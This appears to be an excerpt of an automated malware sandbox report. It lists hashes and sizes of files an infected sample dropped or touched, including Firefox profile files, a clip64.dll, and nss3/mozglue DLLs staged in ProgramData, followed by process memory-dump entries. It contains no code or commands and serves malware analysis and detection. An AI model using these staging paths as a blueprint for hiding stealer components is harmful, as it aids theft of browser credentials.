                            8ee42d9258e20bbc5bfdfae61605429beb5421ffeaaa0d02b86d4978f4b4ac4e

                            SHA512

                            d329a1a1d98e302142f2776de8cc2cd45a465d77cb21c461bdf5ee58c68073a715519f449cb673977288fe18401a0abcce636c85abaec61a4a7a08a16c924275

                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\z3l10m6w.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.lib

                            Filesize

                            1KB

                            MD5

                            688bed3676d2104e7f17ae1cd2c59404

                            SHA1

                            952b2cdf783ac72fcb98338723e9afd38d47ad8e

                            SHA256

                            33899a3ebc22cb8ed8de7bd48c1c29486c0279b06d7ef98241c92aef4e3b9237

                            SHA512

                            7a0e3791f75c229af79dd302f7d0594279f664886fea228cfe78e24ef185ae63aba809aa1036feb3130066deadc8e78909c277f0a7ed1e3485df3cf2cd329776

                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\z3l10m6w.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.sig

                            Filesize

                            1KB

                            MD5

                            937326fead5fd401f6cca9118bd9ade9

                            SHA1

                            4526a57d4ae14ed29b37632c72aef3c408189d91

                            SHA256

                            68a03f075db104f84afdd8fca45a7e4bff7b55dc1a2a24272b3abe16d8759c81

                            SHA512

                            b232f6cf3f88adb346281167ac714c4c4c7aac15175087c336911946d12d63d3a3a458e06b298b41a7ec582ef09fe238da3a3166ff89c450117228f7485c22d2

                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\z3l10m6w.default-release\prefs-1.js

                            Filesize

                            7KB

                            MD5

                            9d17f0b34d66f15df68728d13d300ee8

                            SHA1

                            0fe1ddc24f1fc2c5e4802ec34828433545db0a96

                            SHA256

                            5465fef6a769012bb898efe962a7b2cfbe2d0e21bf5236cc2cc0f2cb8ec955e9

                            SHA512

                            687ee2200907fd4243d73ce6b55a5ed3dd782d66ea31d63a3e0ce1f439337d2394fac9f7b2422c08bdf3124e02300d9aea91ad766c8837d2949b87ee46039d07

                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\z3l10m6w.default-release\prefs.js

                            Filesize

                            6KB

                            MD5

                            87c1b4d0c4dec3f62175cb29ddd61dbe

                            SHA1

                            1a515e12e90959425542bb29b8792ab9f98cb753

                            SHA256

                            16a9050a13be4f2e6b8a2c66c0e4ccc11ee240fac46099b4a8ed568c9b29a393

                            SHA512

                            6005aa8dd13be020fa478b98cc7e41ecf9ea7f08ea3d1988de49b5cbc4948a2ad9fb84740d58b02d3993a0aca4dd6adcdf9c8ce7654212fdc25d1854acf3d843

                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\z3l10m6w.default-release\prefs.js

                            Filesize

                            6KB

                            MD5

                            83b9481eeff8ac247dcb267aa7abaa3c

                            SHA1

                            8631a32922c92166666fda4b93a2c1b927123648

                            SHA256

                            637adfdd923bf4db50b39cbc79f38ad63d882af3155b098c9ee9020d510c2a2d

                            SHA512

                            cae8fa7d5394b9cade7f625099bf76a2f8c13dba19a5b37bd668c2869ea7b896eb8dd4cc37eef6c5b4fbead1972d3cfb45ee07d7ae78c5b2a16550e4951854c3

                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\z3l10m6w.default-release\prefs.js

                            Filesize

                            7KB

                            MD5

                            9d14ef88f7a734f23dedda239eb90a16

                            SHA1

                            8dcba0b5e6c6600ce4559b711f7038492c433025

                            SHA256

                            5b42a6eaf2cfe37a36123e5cf150d8169f5fe239dd053215e7b0eec170186fdb

                            SHA512

                            491134238cca9956f4d5a06befe808885a4cfb8e58c7bec8f753fb52f50a6ef5fd0253e898a7c720bf44776c00685a737ab7584f8a8f56e1ed4b136071eb33b1

                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\z3l10m6w.default-release\prefs.js

                            Filesize

                            6KB

                            MD5

                            0bbc919c461d6ba99d6580962211fbfd

                            SHA1

                            3a193a94349b2d7105418e85b491b911af7bd8e7

                            SHA256

                            6da5c7dcff2f4cb5d766e04df8be91cc59b54e1d20f9233d1b18041d6cc40931

                            SHA512

                            04396cac98812e12ed638dd2e6270ec5d1412c0de95721a033126f87116d958a64f5927d68560b34a045b75dc05d02b88cb635c9809f4cd22539955c664475b1

                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\z3l10m6w.default-release\sessionstore-backups\recovery.jsonlz4

                            Filesize

                            4KB

                            MD5

                            59f7a774fc9a6810e2dd1a3fdd68d266

                            SHA1

                            0a4c35f18db71d17ed6545c0a78677d8088f0d96

                            SHA256

                            298f9ef06e254c66c4db37f906537fe889683ee91d47b98247f76a973fd4a414

                            SHA512

                            0002cf0eeb9a33e04e618e483cc3646fd5fbce0568786f2e08601b3e4a5c3f58565552a7686cb9da17534e2e9e4689edb263431ea0412ca3a293554858356348

                          • C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\clip64.dll

                            Filesize

                            124KB

                            MD5

                            0d3418372c854ee228b78e16ea7059be

                            SHA1

                            c0a29d4e74d39308a50f4fd21d0cca1f98cb02c1

                            SHA256

                            885bf0b3b12b77ef3f953fbb48def1b45079faa2a4d574ee16afdbafa1de3ac7

                            SHA512

                            e30dced307e04ae664367a998cd1ba36349e99e363f70897b5d90c898de2c69c393182c3afba63a74956b5e6f49f0635468e88ed31dd1e3c86c21e987ddd2c19

                          • \ProgramData\mozglue.dll

                            Filesize

                            593KB

                            MD5

                            c8fd9be83bc728cc04beffafc2907fe9

                            SHA1

                            95ab9f701e0024cedfbd312bcfe4e726744c4f2e

                            SHA256

                            ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

                            SHA512

                            fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

                          • \ProgramData\nss3.dll

                            Filesize

                            2.0MB

                            MD5

                            1cc453cdf74f31e4d913ff9c10acdde2

                            SHA1

                            6e85eae544d6e965f15fa5c39700fa7202f3aafe

                            SHA256

                            ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

                            SHA512

                            dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

                          • \Users\Admin\AppData\Local\Temp\is-50G2V.tmp\stories.tmp

                            Filesize

                            689KB

                            MD5

                            60036d8f272457648671fec6fd8215f4

                            SHA1

                            3685338ef75edde50c8ab794bdcc73f70ba36bd3

                            SHA256

                            e3384fe9466d2b9f88428a30d6068b496f405a826dd221160b9f307050cce2f1

                            SHA512

                            711d4dd2d92d512fd9b19f44b9568afacc03a50842495a983398523cb6b0b3bcc6fe3e66deb2cc044924e40c96b7c7ada80540e72902b8438a4e8e073ea21358

                          • \Users\Admin\AppData\Local\Temp\is-V1K9H.tmp\_isetup\_iscrypt.dll

                            Filesize

                            2KB

                            MD5

                            a69559718ab506675e907fe49deb71e9

                            SHA1

                            bc8f404ffdb1960b50c12ff9413c893b56f2e36f

                            SHA256

                            2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc

                            SHA512

                            e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

                          • \Users\Admin\AppData\Local\Temp\is-V1K9H.tmp\_isetup\_shfoldr.dll

                            Filesize

                            22KB

                            MD5

                            92dc6ef532fbb4a5c3201469a5b5eb63

                            SHA1

                            3e89ff837147c16b4e41c30d6c796374e0b8e62c

                            SHA256

                            9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87

                            SHA512

                            9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

                          • \Users\Admin\AppData\Local\VideoJet 4.1.3.33\sqlite3.dll

                            Filesize

                            630KB

                            MD5

                            e477a96c8f2b18d6b5c27bde49c990bf

                            SHA1

                            e980c9bf41330d1e5bd04556db4646a0210f7409

                            SHA256

                            16574f51785b0e2fc29c2c61477eb47bb39f714829999511dc8952b43ab17660

                            SHA512

                            335a86268e7c0e568b1c30981ec644e6cd332e66f96d2551b58a82515316693c1859d87b4f4b7310cf1ac386cee671580fdd999c3bcb23acf2c2282c01c8798c

                          • memory/296-193-0x0000000000C60000-0x0000000000EC1000-memory.dmp

                            Filesize

                            2.4MB

                          • memory/296-338-0x0000000000C60000-0x0000000000EC1000-memory.dmp

                            Filesize

                            2.4MB

                          • memory/296-232-0x0000000061E00000-0x0000000061EF3000-memory.dmp

                            Filesize

                            972KB

                          • memory/1040-3-0x00000000008C0000-0x0000000000BD5000-memory.dmp

                            Filesize

                            3.1MB

                          • memory/1040-14-0x0000000006880000-0x0000000006B95000-memory.dmp

                            Filesize

                            3.1MB

                          • memory/1040-1-0x0000000077AD0000-0x0000000077AD2000-memory.dmp

                            Filesize

                            8KB

                          • memory/1040-0-0x00000000008C0000-0x0000000000BD5000-memory.dmp

                            Filesize

                            3.1MB

                          • memory/1040-18-0x00000000008C1000-0x0000000000929000-memory.dmp

                            Filesize

                            416KB

                          • memory/1040-4-0x00000000008C0000-0x0000000000BD5000-memory.dmp

                            Filesize

                            3.1MB

                          • memory/1040-16-0x00000000008C0000-0x0000000000BD5000-memory.dmp

                            Filesize

                            3.1MB

                          • memory/1040-2-0x00000000008C1000-0x0000000000929000-memory.dmp

                            Filesize

                            416KB

                          • memory/1464-390-0x0000000000D00000-0x000000000135B000-memory.dmp

                            Filesize

                            6.4MB

                          • memory/1504-346-0x0000000000E40000-0x000000000113B000-memory.dmp

                            Filesize

                            3.0MB

                          • memory/1504-230-0x0000000000E40000-0x000000000113B000-memory.dmp

                            Filesize

                            3.0MB

                          • memory/1504-348-0x0000000000E40000-0x000000000113B000-memory.dmp

                            Filesize

                            3.0MB

                          • memory/1504-461-0x0000000000E40000-0x000000000113B000-memory.dmp

                            Filesize

                            3.0MB

                          • memory/1512-134-0x0000000000400000-0x0000000000414000-memory.dmp

                            Filesize

                            80KB

                          • memory/1512-40-0x0000000000400000-0x0000000000414000-memory.dmp

                            Filesize

                            80KB

                          • memory/1916-520-0x0000000000400000-0x0000000000C67000-memory.dmp

                            Filesize

                            8.4MB

                          • memory/1916-1034-0x0000000000400000-0x0000000000C67000-memory.dmp

                            Filesize

                            8.4MB

                          • memory/1916-479-0x0000000010000000-0x000000001001C000-memory.dmp

                            Filesize

                            112KB

                          • memory/1916-512-0x0000000000400000-0x0000000000C67000-memory.dmp

                            Filesize

                            8.4MB

                          • memory/1916-381-0x0000000000400000-0x0000000000C67000-memory.dmp

                            Filesize

                            8.4MB

                          • memory/1996-171-0x0000000006CE0000-0x00000000071A4000-memory.dmp

                            Filesize

                            4.8MB

                          • memory/1996-172-0x0000000000BB0000-0x0000000001074000-memory.dmp

                            Filesize

                            4.8MB

                          • memory/1996-156-0x0000000000BB0000-0x0000000001074000-memory.dmp

                            Filesize

                            4.8MB

                          • memory/2040-352-0x0000000000400000-0x00000000006FB000-memory.dmp

                            Filesize

                            3.0MB

                          • memory/2040-490-0x0000000000400000-0x00000000006FB000-memory.dmp

                            Filesize

                            3.0MB

                          • memory/2040-133-0x0000000000400000-0x00000000006FB000-memory.dmp

                            Filesize

                            3.0MB

                          • memory/2040-566-0x0000000000400000-0x00000000006FB000-memory.dmp

                            Filesize

                            3.0MB

                          • memory/2040-137-0x0000000000400000-0x00000000006FB000-memory.dmp

                            Filesize

                            3.0MB

                          • memory/2040-138-0x0000000060900000-0x0000000060992000-memory.dmp

                            Filesize

                            584KB

                          • memory/2040-286-0x0000000000400000-0x00000000006FB000-memory.dmp

                            Filesize

                            3.0MB

                          • memory/2040-104-0x0000000000400000-0x00000000006FB000-memory.dmp

                            Filesize

                            3.0MB

                          • memory/2040-90-0x0000000000400000-0x00000000006FB000-memory.dmp

                            Filesize

                            3.0MB

                          • memory/2220-482-0x0000000006D00000-0x000000000754D000-memory.dmp

                            Filesize

                            8.3MB

                          • memory/2220-231-0x0000000000F40000-0x0000000001404000-memory.dmp

                            Filesize

                            4.8MB

                          • memory/2220-194-0x00000000066E0000-0x0000000006941000-memory.dmp

                            Filesize

                            2.4MB

                          • memory/2220-192-0x00000000066E0000-0x0000000006941000-memory.dmp

                            Filesize

                            2.4MB

                          • memory/2220-174-0x0000000000F40000-0x0000000001404000-memory.dmp

                            Filesize

                            4.8MB

                          • memory/2220-300-0x0000000000F40000-0x0000000001404000-memory.dmp

                            Filesize

                            4.8MB

                          • memory/2220-947-0x00000000066E0000-0x0000000006941000-memory.dmp

                            Filesize

                            2.4MB

                          • memory/2220-325-0x0000000006D00000-0x0000000006FFB000-memory.dmp

                            Filesize

                            3.0MB

                          • memory/2220-347-0x0000000006D00000-0x0000000006FFB000-memory.dmp

                            Filesize

                            3.0MB

                          • memory/2220-587-0x0000000000F40000-0x0000000001404000-memory.dmp

                            Filesize

                            4.8MB

                          • memory/2220-568-0x0000000006D00000-0x000000000754D000-memory.dmp

                            Filesize

                            8.3MB

                          • memory/2220-519-0x0000000000F40000-0x0000000001404000-memory.dmp

                            Filesize

                            4.8MB

                          • memory/2220-228-0x0000000006D00000-0x0000000006FFB000-memory.dmp

                            Filesize

                            3.0MB

                          • memory/2220-229-0x0000000006D00000-0x0000000006FFB000-memory.dmp

                            Filesize

                            3.0MB

                          • memory/2220-362-0x0000000000F40000-0x0000000001404000-memory.dmp

                            Filesize

                            4.8MB

                          • memory/2224-556-0x0000000000880000-0x0000000000D22000-memory.dmp

                            Filesize

                            4.6MB

                          • memory/2428-562-0x0000000000330000-0x00000000009E9000-memory.dmp

                            Filesize

                            6.7MB

                          • memory/2808-521-0x0000000000240000-0x00000000008F9000-memory.dmp

                            Filesize

                            6.7MB

                          • memory/2812-561-0x0000000000A20000-0x00000000016D1000-memory.dmp

                            Filesize

                            12.7MB

                          • memory/2864-136-0x0000000000400000-0x00000000004BC000-memory.dmp

                            Filesize

                            752KB

                          • memory/2864-132-0x0000000005380000-0x000000000567B000-memory.dmp

                            Filesize

                            3.0MB

                          • memory/2864-89-0x0000000005380000-0x000000000567B000-memory.dmp

                            Filesize

                            3.0MB

                          • memory/2912-534-0x0000000000400000-0x0000000000C4D000-memory.dmp

                            Filesize

                            8.3MB

                          • memory/2912-486-0x0000000000400000-0x0000000000C4D000-memory.dmp

                            Filesize

                            8.3MB

                          • memory/2912-487-0x0000000000400000-0x0000000000C4D000-memory.dmp

                            Filesize

                            8.3MB

                          • memory/2912-485-0x0000000000400000-0x0000000000C4D000-memory.dmp

                            Filesize

                            8.3MB

                          • memory/2912-484-0x0000000000400000-0x0000000000C4D000-memory.dmp

                            Filesize

                            8.3MB

                          • memory/2980-569-0x0000000000880000-0x0000000000D22000-memory.dmp

                            Filesize

                            4.6MB

                          • memory/3048-285-0x0000000000B30000-0x0000000000E45000-memory.dmp

                            Filesize

                            3.1MB

                          • memory/3048-489-0x0000000000B30000-0x0000000000E45000-memory.dmp

                            Filesize

                            3.1MB

                          • memory/3048-157-0x00000000069A0000-0x0000000006E64000-memory.dmp

                            Filesize

                            4.8MB

                          • memory/3048-563-0x0000000000B30000-0x0000000000E45000-memory.dmp

                            Filesize

                            3.1MB

                          • memory/3048-135-0x0000000000B30000-0x0000000000E45000-memory.dmp

                            Filesize

                            3.1MB

                          • memory/3048-17-0x0000000000B30000-0x0000000000E45000-memory.dmp

                            Filesize

                            3.1MB

                          • memory/3048-371-0x0000000006710000-0x0000000006F77000-memory.dmp

                            Filesize

                            8.4MB

                          • memory/3048-211-0x00000000069A0000-0x0000000006E64000-memory.dmp

                            Filesize

                            4.8MB

                          • memory/3048-511-0x0000000006710000-0x0000000006F77000-memory.dmp

                            Filesize

                            8.4MB

                          • memory/3048-19-0x0000000000B31000-0x0000000000B99000-memory.dmp

                            Filesize

                            416KB

                          • memory/3048-20-0x0000000000B30000-0x0000000000E45000-memory.dmp

                            Filesize

                            3.1MB

                          • memory/3048-380-0x0000000006710000-0x0000000006F77000-memory.dmp

                            Filesize

                            8.4MB

                          • memory/3048-88-0x0000000000B30000-0x0000000000E45000-memory.dmp

                            Filesize

                            3.1MB

                          • memory/3048-155-0x00000000069A0000-0x0000000006E64000-memory.dmp

                            Filesize

                            4.8MB

                          • memory/3048-351-0x0000000000B30000-0x0000000000E45000-memory.dmp

                            Filesize

                            3.1MB

                          • memory/3048-87-0x0000000000B31000-0x0000000000B99000-memory.dmp

                            Filesize

                            416KB

                          • memory/3048-84-0x0000000000B30000-0x0000000000E45000-memory.dmp

                            Filesize

                            3.1MB

                          • memory/3048-26-0x0000000000B30000-0x0000000000E45000-memory.dmp

                            Filesize

                            3.1MB

                          • memory/3048-25-0x0000000000B30000-0x0000000000E45000-memory.dmp

                            Filesize

                            3.1MB

                          • memory/3048-23-0x0000000000B30000-0x0000000000E45000-memory.dmp

                            Filesize

                            3.1MB

                          • memory/3048-24-0x0000000000B30000-0x0000000000E45000-memory.dmp

                            Filesize

                            3.1MB

                          • memory/3048-21-0x0000000000B30000-0x0000000000E45000-memory.dmp

                            Filesize

                            3.1MB

                          • memory/3200-748-0x0000000000B70000-0x0000000000E36000-memory.dmp

                            Filesize

                            2.8MB

                          • memory/3200-747-0x0000000000B70000-0x0000000000E36000-memory.dmp

                            Filesize

                            2.8MB

                          • memory/3620-795-0x00000000027E0000-0x00000000027E8000-memory.dmp

                            Filesize

                            32KB

                          • memory/3620-794-0x000000001B440000-0x000000001B722000-memory.dmp

                            Filesize

                            2.9MB

                          We care about your privacy.

                          This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.